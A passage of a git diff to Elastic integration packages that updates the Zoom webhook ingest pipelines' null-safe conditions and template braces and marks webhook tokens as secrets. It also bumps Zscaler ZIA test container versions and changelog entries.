zoom.meeting.start_time ignore_missing: true - if: ctx?.event?.action == 'meeting.started' + if: ctx.event?.action == 'meeting.started' - remove: field: zoom.meeting.duration ignore_missing: true - if: ctx?.event?.duration != null + if: ctx.event?.duration != null - remove: field: zoom.participant.sharing_details.date_time ignore_missing: true - if: ctx?.event?.action == 'meeting.sharing_started' + if: ctx.event?.action == 'meeting.sharing_started' - remove: field: zoom.participant.date_time ignore_missing: true - if: "['meeting.participant_put_in_waiting_room', 'meeting.participant_joined_waiting_room', 'meeting.participant_left_waiting_room'].contains(ctx?.event?.action)" + if: >- + [ + 'meeting.participant_put_in_waiting_room', + 'meeting.participant_joined_waiting_room', + 'meeting.participant_left_waiting_room' + ].contains(ctx.event?.action) - remove: field: zoom.participant.join_time ignore_missing: true - if: ctx?.event?.action == 'meeting.participant_joined' + if: ctx.event?.action == 'meeting.participant_joined' - remove: field: zoom.participant.leave_time ignore_missing: true - if: ctx?.event?.action == 'meeting.participant_left' + if: ctx.event?.action == 'meeting.participant_left' - remove: field: zoom.time_stamp ignore_missing: true - if: ctx?.event?.action == 'meeting.updated' + if: ctx.event?.action == 'meeting.updated' on_failure: - set: field: event.kind diff --git a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/phone.yml b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/phone.yml index e1b8e662591..90aa2b6b29c 100644 --- a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/phone.yml +++ b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/phone.yml @@ -7,15 +7,15 @@ processors: - append: field: event.type value: creation - if: "['phone.caller_ringing', 'phone.callee_ringing'].contains(ctx?.event?.action)" + if: "['phone.caller_ringing', 'phone.callee_ringing'].contains(ctx.event?.action)" - append: field: event.type value: start - if: "['phone.callee_answered', 'phone.caller_connected'].contains(ctx?.event?.action)" + if: "['phone.callee_answered', 'phone.caller_connected'].contains(ctx.event?.action)" - append: field: event.type value: end - if: "['phone.callee_missed', 'phone.callee_ended', 'phone.caller_ended'].contains(ctx?.event?.action)" + if: "['phone.callee_missed', 'phone.callee_ended', 'phone.caller_ended'].contains(ctx.event?.action)" - rename: field: zoom.object target_field: zoom.phone @@ -29,35 +29,41 @@ processors: target_field: '@timestamp' formats: - ISO_INSTANT - if: "['phone.callee_ringing', 'phone.caller_ringing', 'phone.caller_ended'].contains(ctx?.event?.action)" + if: "['phone.callee_ringing', 'phone.caller_ringing', 'phone.caller_ended'].contains(ctx.event?.action)" ignore_failure: true - date: field: zoom.phone.connected_start_time target_field: '@timestamp' formats: - ISO_INSTANT - if: ctx?.event?.action == 'phone.caller_connected' + if: ctx.event?.action == 'phone.caller_connected' ignore_failure: true - date: field: zoom.phone.answer_start_time target_field: '@timestamp' formats: - ISO_INSTANT - if: "ctx?.zoom?.phone.answer_start_time != null && ctx?.event?.action == 'phone.callee_answered'" + if: ctx.zoom?.phone?.answer_start_time != null && ctx.event?.action == 'phone.callee_answered' ignore_failure: true - date: field: zoom.phone.call_end_time target_field: '@timestamp' formats: - ISO_INSTANT - if: "['phone.callee_missed', 'phone.callee_ended', 'phone.caller_ended', 'phone.callee_rejected'].contains(ctx?.event?.action)" + if: >- + [ + 'phone.callee_missed', + 'phone.callee_ended', + 'phone.caller_ended', + 'phone.callee_rejected' + ].contains(ctx.event?.action) ignore_failure: true - date: field: zoom.phone.date_time target_field: '@timestamp' formats: - ISO_INSTANT - if: ctx?.event?.action == 'phone.voicemail_received' + if: ctx.event?.action == 'phone.voicemail_received' ignore_failure: true - convert: field: zoom.phone.duration @@ -66,7 +72,7 @@ processors: # Calculates duration when duration is unknown but start and end time is known (with ringing_start_time) - script: lang: painless - if: "ctx?.zoom?.phone?.ringing_start_time != null && ctx?.zoom?.phone?.answer_start_time == null && ctx?.zoom?.phone?.call_end_time != null && ctx?.zoom?.phone?.duration == null" + if: ctx.zoom?.phone?.ringing_start_time != null && ctx.zoom?.phone?.answer_start_time == null && ctx.zoom?.phone?.call_end_time != null && ctx.zoom?.phone?.duration == null source: >- ctx.event.start = ctx.zoom.phone.ringing_start_time; ctx.event.end = ctx.zoom.phone.call_end_time; @@ -77,7 +83,7 @@ processors: # Calculates duration when duration is unknown but start and end time is known (with answer_start_time) - script: lang: painless - if: "ctx?.zoom?.phone?.ringing_start_time == null && ctx?.zoom?.phone?.answer_start_time != null && ctx?.zoom?.phone?.call_end_time != null && ctx?.zoom?.phone?.duration == null" + if: ctx.zoom?.phone?.ringing_start_time == null && ctx.zoom?.phone?.answer_start_time != null && ctx.zoom?.phone?.call_end_time != null && ctx.zoom?.phone?.duration == null source: >- ctx.event.start = ctx.zoom.phone.answer_start_time; ctx.event.end = ctx.zoom.phone.call_end_time; @@ -88,7 +94,7 @@ processors: # Duration is in minutes, so multiply by seconds and then multiply again to convert seconds to nano - script: lang: painless - if: ctx?.zoom?.duration != null + if: ctx.zoom?.duration != null source: >- ctx.event.duration = ctx.zoom.phone.duration * 60L * 1000000000L; @@ -144,30 +150,30 @@ processors: ignore_missing: true - append: field: related.user - value: "{{zoom.phone.callee.user_id}}" + value: "{{{zoom.phone.callee.user_id}}}" allow_duplicates: false - if: ctx?.zoom?.phone?.callee?.user_id != null + if: ctx.zoom?.phone?.callee?.user_id != null - append: field: related.user - value: "{{zoom.phone.callee_user_id}}" + value: "{{{zoom.phone.callee_user_id}}}" allow_duplicates: false - if: ctx?.zoom?.phone?.callee_user_id != null + if: ctx.zoom?.phone?.callee_user_id != null - append: field: related.user - value: "{{zoom.phone.caller.user_id}}" + value: "{{{zoom.phone.caller.user_id}}}" allow_duplicates: false - if: ctx?.zoom?.phone?.caller?.user_id != null + if: ctx.zoom?.phone?.caller?.user_id != null - remove: field: zoom.phone.date_time ignore_missing: true - if: ctx?.event?.action == 'phone.voicemail_received' + if: ctx.event?.action == 'phone.voicemail_received' - set: field: source.user.id - value: '{{zoom.phone.caller.user_id}}' + value: '{{{zoom.phone.caller.user_id}}}' ignore_empty_value: true - set: field: destination.user.id - value: '{{zoom.phone.callee.user_id}}' + value: '{{{zoom.phone.callee.user_id}}}' ignore_empty_value: true on_failure: - set: diff --git a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/recording.yml b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/recording.yml index 2471ba46823..14c881b8e88 100644 --- a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/recording.yml +++ b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/recording.yml @@ -7,31 +7,31 @@ processors: - append: field: event.type value: creation - if: ctx?.event?.action == 'recording.registration_created' + if: ctx.event?.action == 'recording.registration_created' - append: field: event.type value: allowed - if: ctx?.event?.action == 'recording.registration_approved' + if: ctx.event?.action == 'recording.registration_approved' - append: field: event.type value: denied - if: ctx?.event?.action == 'recording.registration_denied' + if: ctx.event?.action == 'recording.registration_denied' - append: field: event.type value: deletion - if: "['recording.deleted', 'recording.trashed'].contains(ctx?.event?.action)" + if: "['recording.deleted', 'recording.trashed'].contains(ctx.event?.action)" - append: field: event.type value: change - if: "['recording.paused', 'recording.resumed', 'recording.renamed', 'recording.recovered'].contains(ctx?.event?.action)" + if: "['recording.paused', 'recording.resumed', 'recording.renamed', 'recording.recovered'].contains(ctx.event?.action)" - append: field: event.type value: start - if: ctx?.event?.action == 'recording.started' + if: ctx.event?.action == 'recording.started' - append: field: event.type value: end - if: "['recording.stopped', 'recording.completed', 'recording.transcript_completed'].contains(ctx?.event?.action)" + if: "['recording.stopped', 'recording.completed', 'recording.transcript_completed'].contains(ctx.event?.action)" - rename: field: zoom.object target_field: zoom.recording @@ -45,27 +45,27 @@ processors: target_field: '@timestamp' formats: - UNIX_MS - if: ctx?.event?.action == 'recording.renamed' + if: ctx.event?.action == 'recording.renamed' ignore_failure: true - remove: field: zoom.recording.recording_file.recording_start - if: 'ctx.zoom?.recording?.recording_file?.recording_start == ""' + if: ctx.zoom?.recording?.recording_file?.recording_start == "" - remove: field: zoom.recording.recording_file.recording_end - if: 'ctx.zoom?.recording?.recording_file?.recording_end == ""' + if: ctx.zoom?.recording?.recording_file?.recording_end == "" - set: field: event.start - value: '{{ zoom.recording.recording_file.recording_start }}' + value: '{{{ zoom.recording.recording_file.recording_start }}}' ignore_empty_value: true - if: ctx?.event?.action == 'recording.started' + if: ctx.event?.action == 'recording.started' - set: field: event.end - value: '{{ zoom.recording.recording_file.recording_end }}' + value: '{{{ zoom.recording.recording_file.recording_end }}}' ignore_empty_value: true - if: ctx?.event?.action == 'recording.stopped' + if: ctx.event?.action == 'recording.stopped' - script: lang: painless - if: "ctx?.event?.end != null && ctx?.event?.start != null && ctx?.event?.action == 'recording.stopped'" + if: ctx.event?.end != null && ctx.event?.start != null && ctx.event?.action == 'recording.stopped' source: >- ZonedDateTime start = ZonedDateTime.parse(ctx.event.start); ZonedDateTime end = ZonedDateTime.parse(ctx.event.end); @@ -75,40 +75,40 @@ processors: target_field: '@timestamp' formats: - ISO_INSTANT - if: "ctx?.zoom?.recording?.recording_file?.recording_start != null && ctx?.event?.action == 'recording.started'" + if: ctx.zoom?.recording?.recording_file?.recording_start != null && ctx.event?.action == 'recording.started' ignore_failure: true - append: field: related.user - value: "{{zoom.recording.host_id}}" - if: "ctx?.zoom?.recording?.host_id != null" + value: "{{{zoom.recording.host_id}}}" + if: ctx.zoom?.recording?.host_id != null - append: field: related.user - value: "{{zoom.registrant.id}}" - if: "ctx?.zoom?.registrant?.id != null" + value: "{{{zoom.registrant.id}}}" + if: ctx.zoom?.registrant?.id != null - remove: field: zoom.time_stamp ignore_missing: true - if: ctx?.event?.action == 'recording.renamed' + if: ctx.event?.action == 'recording.renamed' - set: field: 'user.email' - value: '{{zoom.registrant.email}}' + value: '{{{zoom.registrant.email}}}' ignore_empty_value: true - if: 'ctx.user?.id == null && ctx.zoom?.registrant != null' + if: ctx.user?.id == null && ctx.zoom?.registrant != null - set: field: 'user.full_name' value: '{{zoom.registrant.first_name}} {{zoom.registrant.last_name}}' ignore_empty_value: true - if: 'ctx.user?.id == null && ctx.zoom?.registrant != null' + if: ctx.user?.id == null && ctx.zoom?.registrant != null - set: field: 'user.id' - value: '{{zoom.registrant.id}}' + value: '{{{zoom.registrant.id}}}' ignore_empty_value: true - if: 'ctx.user?.id == null && ctx.zoom?.registrant != null' + if: ctx.user?.id == null && ctx.zoom?.registrant != null - set: field: 'user.id' - value: '{{zoom.recording.host_id}}' + value: '{{{zoom.recording.host_id}}}' ignore_empty_value: true - if: 'ctx.zoom?.registrant == null' + if: ctx.zoom?.registrant == null on_failure: - set: field: event.kind diff --git a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/user.yml b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/user.yml index a249c2c53ca..80de6fab4dd 100644 --- a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/user.yml +++ b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/user.yml @@ -4,35 +4,44 @@ processors: - append: field: event.category value: configuration - if: "['user.settings_updated'].contains(ctx?.event?.action)" + if: ctx.event?.action == 'user.settings_updated' - append: field: event.category value: iam - if: "!['user.signed_in', 'user.signed_out'].contains(ctx?.event?.action)" + if: "!['user.signed_in', 'user.signed_out'].contains(ctx.event?.action)" - append: field: event.category value: authentication - if: "['user.signed_in', 'user.signed_out'].contains(ctx?.event?.action)" + if: "['user.signed_in', 'user.signed_out'].contains(ctx.event?.action)" - append: field: event.type value: creation - if: ctx?.event?.action == 'user.created' + if: ctx.event?.action == 'user.created' - append: field: event.type value: deletion - if: ctx?.event?.action == 'user.deleted' + if: ctx.event?.action == 'user.deleted' - append: field: event.type value: change - if: "['user.updated', 'user.settings_updated', 'user.deactivated', 'user.activated', 'user.disassociated', 'user.presence_status_updated', 'user.personal_notes_updated'].contains(ctx?.event?.action)" + if: >- + [ + 'user.updated', + 'user.settings_updated', + 'user.deactivated', + 'user.activated', + 'user.disassociated', + 'user.presence_status_updated', + 'user.personal_notes_updated' + ].contains(ctx.event?.action) - append: field: event.type value: start - if: ctx?.event?.action == 'user.signed_in' + if: ctx.event?.action == 'user.signed_in' - append: field: event.type value: end - if: ctx?.event?.action == 'user.signed_out' + if: ctx.event?.action == 'user.signed_out' - rename: field: zoom.object target_field: zoom.user @@ -42,19 +51,25 @@ processors: target_field: '@timestamp' formats: - UNIX_MS - if: "['user.updated', 'user.settings_updated'].contains(ctx?.event?.action)" + if: "['user.updated', 'user.settings_updated'].contains(ctx.event?.action)" ignore_failure: true - date: field: zoom.user.date_time target_field: '@timestamp' formats: - ISO_INSTANT - if: "['user.signed_in', 'user.signed_out', 'user.personal_notes_updated', 'user.presence_status_updated'].contains(ctx?.event?.action)" + if: >- + [ + 'user.signed_in', + 'user.signed_out', + 'user.personal_notes_updated', + 'user.presence_status_updated' + ].contains(ctx.event?.action) ignore_failure: true - append: field: related.user - value: "{{zoom.user.id}}" - if: "ctx?.zoom?.user?.id != null" + value: "{{{zoom.user.id}}}" + if: ctx.zoom?.user?.id != null - remove: field: - zoom.time_stamp @@ -66,11 +81,11 @@ processors: # - set: field: user.id - value: '{{zoom.operator_id}}' + value: '{{{zoom.operator_id}}}' ignore_empty_value: true - set: field: user.email - value: '{{zoom.operator}}' + value: '{{{zoom.operator}}}' ignore_empty_value: true # @@ -78,43 +93,43 @@ processors: # - set: field: user.id - value: '{{zoom.user.id}}' + value: '{{{zoom.user.id}}}' ignore_empty_value: true - if: 'ctx.zoom?.operator == null && ctx.zoom?.operator_id == null' + if: ctx.zoom?.operator == null && ctx.zoom?.operator_id == null - set: field: user.email - value: '{{zoom.user.email}}' + value: '{{{zoom.user.email}}}' ignore_empty_value: true - if: 'ctx.zoom?.operator == null && ctx.zoom?.operator_id == null' + if: ctx.zoom?.operator == null && ctx.zoom?.operator_id == null - set: field: user.full_name value: '{{zoom.user.first_name}} {{zoom.user.last_name}}' ignore_empty_value: true - if: 'ctx.zoom?.operator == null && ctx.zoom?.operator_id == null && ctx.zoom?.user?.first_name != null' + if: ctx.zoom?.operator == null && ctx.zoom?.operator_id == null && ctx.zoom?.user?.first_name != null # # set user.target.* from old_values # - set: field: user.target.id - value: '{{zoom.old_values.id}}' + value: '{{{zoom.old_values.id}}}' ignore_empty_value: true - set: field: user.target.id - value: '{{zoom.old_values.id}}' + value: '{{{zoom.old_values.id}}}' ignore_empty_value: true - set: field: user.target.email - value: '{{zoom.old_values.email}}' + value: '{{{zoom.old_values.email}}}' ignore_empty_value: true - set: field: user.target.email - value: '{{zoom.old_values.email}}' + value: '{{{zoom.old_values.email}}}' ignore_empty_value: true - set: field: user.target.full_name value: '{{zoom.old_values.first_name}} {{zoom.old_values.last_name}}' - if: 'ctx.zoom?.old_values?.first_name != null' + if: ctx.zoom?.old_values?.first_name != null # # set user.target.* from user.* without overriding old_values. @@ -122,28 +137,28 @@ processors: # - set: field: user.target.id - value: '{{zoom.user.id}}' + value: '{{{zoom.user.id}}}' ignore_empty_value: true override: false - if: 'ctx.zoom?.old_values != null || ctx.zoom?.operator != null || ctx.zoom?.operator_id != null' + if: ctx.zoom?.old_values != null || ctx.zoom?.operator != null || ctx.zoom?.operator_id != null - set: field: user.target.id - value: '{{zoom.user.id}}' + value: '{{{zoom.user.id}}}' ignore_empty_value: true override: false - if: 'ctx.zoom?.old_values != null || ctx.zoom?.operator != null || ctx.zoom?.operator_id != null' + if: ctx.zoom?.old_values != null || ctx.zoom?.operator != null || ctx.zoom?.operator_id != null - set: field: user.target.email - value: '{{zoom.user.email}}' + value: '{{{zoom.user.email}}}' ignore_empty_value: true override: false - if: 'ctx.zoom?.old_values != null || ctx.zoom?.operator != null || ctx.zoom?.operator_id != null' + if: ctx.zoom?.old_values != null || ctx.zoom?.operator != null || ctx.zoom?.operator_id != null - set: field: user.target.email - value: '{{zoom.user.email}}' + value: '{{{zoom.user.email}}}' ignore_empty_value: true override: false - if: 'ctx.zoom?.old_values != null' + if: ctx.zoom?.old_values != null - set: field: user.target.full_name value: '{{zoom.user.first_name}} {{zoom.user.last_name}}' @@ -155,33 +170,33 @@ processors: # - set: field: user.changes.id - value: '{{zoom.user.id}}' + value: '{{{zoom.user.id}}}' ignore_empty_value: true - if: 'ctx.zoom?.old_values?.id != null && ctx.zoom?.old_values?.id != ctx.zoom?.user?.id' + if: ctx.zoom?.old_values?.id != null && ctx.zoom?.old_values?.id != ctx.zoom?.user?.id - set: field: user.changes.email - value: '{{zoom.user.email}}' + value: '{{{zoom.user.email}}}' ignore_empty_value: true - if: 'ctx.zoom?.old_values?.email != null && ctx.zoom?.old_values?.email != ctx.zoom?.user?.email' + if: ctx.zoom?.old_values?.email != null && ctx.zoom?.old_values?.email != ctx.zoom?.user?.email - set: field: user.changes.full_name value: '{{zoom.user.first_name}} {{zoom.user.last_name}}' ignore_empty_value: true - if: 'ctx.zoom?.old_values?.first_name != null && ctx.zoom?.old_values?.last_name != null && (ctx.zoom?.old_values?.last_name != ctx.zoom?.user?.last_name || ctx.zoom?.old_values?.first_name != ctx.zoom?.user?.first_name)' + if: ctx.zoom?.old_values?.first_name != null && ctx.zoom?.old_values?.last_name != null && (ctx.zoom?.old_values?.last_name != ctx.zoom?.user?.last_name || ctx.zoom?.old_values?.first_name != ctx.zoom?.user?.first_name) # # append to related.user # - append: field: related.user - value: "{{zoom.user.id}}" + value: "{{{zoom.user.id}}}" allow_duplicates: false - if: "ctx.zoom?.user?.id != null" + if: ctx.zoom?.user?.id != null - append: field: related.user - value: "{{zoom.old_values.id}}" + value: "{{{zoom.old_values.id}}}" allow_duplicates: false - if: "ctx.zoom?.old_values?.id != null" + if: ctx.zoom?.old_values?.id != null on_failure: - set: diff --git a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/webinar.yml b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/webinar.yml index 6d9cff0ce4f..b3d4bd0724d 100644 --- a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/webinar.yml +++ b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/webinar.yml @@ -4,39 +4,45 @@ processors: - append: field: event.type value: info - if: ctx?.event?.action != 'webinar.alert' + if: ctx.event?.action != 'webinar.alert' - append: field: event.type value: error - if: ctx?.event?.action == 'webinar.alert' + if: ctx.event?.action == 'webinar.alert' - append: field: event.type value: creation - if: "['webinar.created', 'webinar.registration_created'].contains(ctx?.event?.action)" + if: "['webinar.created', 'webinar.registration_created'].contains(ctx.event?.action)" - append: field: event.type value: deletion - if: ctx?.event?.action == 'webinar.deleted' + if: ctx.event?.action == 'webinar.deleted' - append: field: event.type value: allowed - if: ctx?.event?.action == 'webinar.registration_approved' + if: ctx.event?.action == 'webinar.registration_approved' - append: field: event.type value: denied - if: ctx?.event?.action == 'webinar.registration_denied' + if: ctx.event?.action == 'webinar.registration_denied' - append: field: event.type value: change - if: "['webinar.updated', 'webinar.registration_approved', 'webinar.registration_denied', 'webinar.registration_cancelled'].contains(ctx?.event?.action)" + if: >- + [ + 'webinar.updated', + 'webinar.registration_approved', + 'webinar.registration_denied', + 'webinar.registration_cancelled' + ].contains(ctx.event?.action) - append: field: event.type value: start - if: "['webinar.started', 'webinar.sharing_started'].contains(ctx?.event?.action)" + if: "['webinar.started', 'webinar.sharing_started'].contains(ctx.event?.action)" - append: field: event.type value: end - if: "['webinar.ended', 'webinar.sharing_ended'].contains(ctx?.event?.action)" + if: "['webinar.ended', 'webinar.sharing_ended'].contains(ctx.event?.action)" - rename: field: zoom.object target_field: zoom.webinar @@ -46,28 +52,28 @@ processors: target_field: '@timestamp' formats: - UNIX_MS - if: ctx?.event?.action == 'webinar.updated' + if: ctx.event?.action == 'webinar.updated' ignore_failure: true - date: field: zoom.webinar.start_time target_field: '@timestamp' formats: - ISO_INSTANT - if: ctx?.event?.action == 'webinar.started' + if: ctx.event?.action == 'webinar.started' ignore_failure: true - date: field: zoom.participant.join_time target_field: '@timestamp' formats: - ISO_INSTANT - if: ctx?.event?.action == 'webinar.participant_joined' + if: ctx.event?.action == 'webinar.participant_joined' ignore_failure: true - date: field: zoom.participant.leave_time target_field: '@timestamp' formats: - ISO_INSTANT - if: ctx?.event?.action == 'webinar.participant_left' + if: ctx.event?.action == 'webinar.participant_left' ignore_failure: true # @@ -75,66 +81,66 @@ processors: # - set: field: user.id - value: '{{zoom.participant.id}}' + value: '{{{zoom.participant.id}}}' ignore_empty_value: true - if: 'ctx.zoom?.participant != null' + if: ctx.zoom?.participant != null - set: field: user.full_name - value: '{{zoom.participant.user_name}}' + value: '{{{zoom.participant.user_name}}}' ignore_empty_value: true - if: 'ctx.zoom?.participant != null' + if: ctx.zoom?.participant != null # # set user.* from registrant # - set: field: user.id - value: '{{zoom.registrant.id}}' + value: '{{{zoom.registrant.id}}}' ignore_empty_value: true - if: 'ctx.zoom?.registrant != null' + if: ctx.zoom?.registrant != null - set: field: user.email - value: '{{zoom.registrant.email}}' + value: '{{{zoom.registrant.email}}}' ignore_empty_value: true - if: 'ctx.zoom?.registrant != null' + if: ctx.zoom?.registrant != null - set: field: user.full_name value: '{{zoom.registrant.first_name}} {{zoom.registrant.last_name}}' ignore_empty_value: true - if: 'ctx.zoom?.registrant != null' + if: ctx.zoom?.registrant != null # # set user.* from operator # - set: field: user.id - value: '{{zoom.operator_id}}' + value: '{{{zoom.operator_id}}}' ignore_empty_value: true - if: 'ctx.zoom?.registrant == null && ctx.zoom?.participant == null' + if: ctx.zoom?.registrant == null && ctx.zoom?.participant == null - set: field: user.email - value: '{{zoom.operator}}' + value: '{{{zoom.operator}}}' ignore_empty_value: true - if: 'ctx.zoom?.registrant == null && ctx.zoom?.participant == null' + if: ctx.zoom?.registrant == null && ctx.zoom?.participant == null # # append to related.user # - append: field: related.user - value: "{{zoom.webinar.host_id}}" + value: "{{{zoom.webinar.host_id}}}" allow_duplicates: false - if: "ctx.zoom?.webinar?.host_id != null" + if: ctx.zoom?.webinar?.host_id != null - append: field: related.user - value: "{{zoom.registrant.id}}" + value: "{{{zoom.registrant.id}}}" allow_duplicates: false - if: "ctx.zoom?.registrant?.id != null" + if: ctx.zoom?.registrant?.id != null - append: field: related.user - value: "{{zoom.participant.id}}" + value: "{{{zoom.participant.id}}}" allow_duplicates: false - if: "ctx.zoom?.participant?.id != null" + if: ctx.zoom?.participant?.id != null on_failure: - set: diff --git a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/zoomroom.yml b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/zoomroom.yml index 232a54fe6fd..e91586a150d 100644 --- a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/zoomroom.yml +++ b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/zoomroom.yml @@ -4,15 +4,15 @@ processors: - append: field: event.type value: info - if: "['zoomroom.checked_in', 'zoomroom.checked_out'].contains(ctx?.event?.action)" + if: "['zoomroom.checked_in', 'zoomroom.checked_out'].contains(ctx.event?.action)" - append: field: event.type value: start - if: ctx?.event?.action == 'zoomroom.checked_in' + if: ctx.event?.action == 'zoomroom.checked_in' - append: field: event.type value: end - if: ctx?.event?.action == 'zoomroom.checked_out' + if: ctx.event?.action == 'zoomroom.checked_out' - rename: field: zoom.object target_field: zoom.zoomroom diff --git a/packages/zoom/data_stream/webhook/manifest.yml b/packages/zoom/data_stream/webhook/manifest.yml index df3ef519119..0c2160a4a06 100644 --- a/packages/zoom/data_stream/webhook/manifest.yml +++ b/packages/zoom/data_stream/webhook/manifest.yml @@ -38,12 +38,13 @@ streams: show_user: true default: false - name: crc_secret - type: text + type: password title: Zoom Secret Token description: Secret token provided by Zoom when the webhook was configured. It is used for the CRC validation of the webhook endpoint. multi: false required: false show_user: true + secret: true - name: secret_header type: text title: Zoom Custom Header @@ -52,13 +53,15 @@ streams: required: false show_user: true default: Authorization + secret: false - name: secret_value - type: text + type: password title: Zoom Custom Header value description: Custom header value used to validate the authenticity of incoming Zoom POST requests. It should be created by the user when configuring the webhook on Zoom. See [Verify webhook events](https://developers.zoom.us/docs/api/rest/webhook-reference/#custom-header) for more information. multi: false required: false show_user: true + secret: true - name: ssl type: yaml title: TLS diff --git a/packages/zoom/manifest.yml b/packages/zoom/manifest.yml index eda21403602..3517285db66 100644 --- a/packages/zoom/manifest.yml +++ b/packages/zoom/manifest.yml @@ -1,13 +1,13 @@ name: zoom title: Zoom -version: "1.18.0" +version: "1.19.0" description: Collect logs from Zoom with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.2" categories: ["security", "productivity_security"] conditions: kibana: - version: ^8.9.0 + version: ^8.12.0 policy_templates: - name: zoom title: Zoom logs diff --git a/packages/zscaler_zia/_dev/deploy/docker/docker-compose.yml b/packages/zscaler_zia/_dev/deploy/docker/docker-compose.yml index 4e7631234c1..8f1365031fe 100644 --- a/packages/zscaler_zia/_dev/deploy/docker/docker-compose.yml +++ b/packages/zscaler_zia/_dev/deploy/docker/docker-compose.yml @@ -1,37 +1,32 @@ version: "2.3" services: zscaler-zia-alerts-tcp: - image: docker.elastic.co/observability/stream:v0.10.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9010 -p=tcp /sample_logs/alerts.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9010 -p=tcp /sample_logs/alerts.log zscaler-zia-dns-tcp: - image: docker.elastic.co/observability/stream:v0.10.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9011 -p=tcp /sample_logs/dns.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9011 -p=tcp /sample_logs/dns.log zscaler-zia-firewall-tcp: - image: docker.elastic.co/observability/stream:v0.10.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9012 -p=tcp /sample_logs/firewall.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9012 -p=tcp /sample_logs/firewall.log zscaler-zia-tunnel-tcp: - image: docker.elastic.co/observability/stream:v0.10.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9013 -p=tcp /sample_logs/tunnel.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9013 -p=tcp /sample_logs/tunnel.log zscaler-zia-web-tcp: - image: docker.elastic.co/observability/stream:v0.10.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9014 -p=tcp /sample_logs/web.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9014 -p=tcp /sample_logs/web.log zscaler-zia-dns-http-endpoint: - image: docker.elastic.co/observability/stream:v0.10.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro environment: @@ -40,7 +35,7 @@ services: - STREAM_WEBHOOK_HEADER=Content-Type=application/ndjson command: log --start-signal=SIGHUP --delay=5s /sample_logs/dns-http_endpoint.log zscaler-zia-firewall-http-endpoint: - image: docker.elastic.co/observability/stream:v0.10.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro environment: @@ -49,7 +44,7 @@ services: - STREAM_WEBHOOK_HEADER=Content-Type=application/ndjson command: log --start-signal=SIGHUP --delay=5s /sample_logs/firewall-http_endpoint.log zscaler-zia-tunnel-http-endpoint: - image: docker.elastic.co/observability/stream:v0.10.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro environment: @@ -58,7 +53,7 @@ services: - STREAM_WEBHOOK_HEADER=Content-Type=application/ndjson command: log --start-signal=SIGHUP --delay=5s /sample_logs/tunnel-http_endpoint.log zscaler-zia-web-http-endpoint: - image: docker.elastic.co/observability/stream:v0.10.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro environment: diff --git a/packages/zscaler_zia/changelog.yml b/packages/zscaler_zia/changelog.yml index 7effcb15fb6..639a2331ac1 100644 --- a/packages/zscaler_zia/changelog.yml +++ b/packages/zscaler_zia/changelog.yml @@ -1,4 +1,19 @@ # newer versions go on top +- version: "2.19.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 +- version: "2.18.3" + changes: + - description: Remove `ignore_failure` clause in web events. + type: bugfix + link: https://github.com/elastic/integrations/pull/9193 +- version: "2.18.2" + changes: + - description: Fix mapping of user identities. + type: bugfix + link: https://github.com/elastic/integrations/pull/9041 - version: "2.18.1" changes: - description: Changed owners diff --git a/packages/zscaler_zia/data_stream/alerts/_dev/test/pipeline/test-alerts.log-expected.json b/packages/zscaler_zia/data_stream/alerts/_dev/test/pipeline/test-alerts.log-expected.json index 54d8feca149..b2007003265 100644 --- a/packages/zscaler_zia/data_stream/alerts/_dev/test/pipeline/test-alerts.log-expected.json +++ b/packages/zscaler_zia/data_stream/alerts/_dev/test/pipeline/test-alerts.log-expected.json @@ -1,7 +1,7 @@ { "expected": [ { - "@timestamp": "2023-12-31T12:01:04.000Z", + "@timestamp": "2024-12-31T12:01:04.000Z", "destination": { 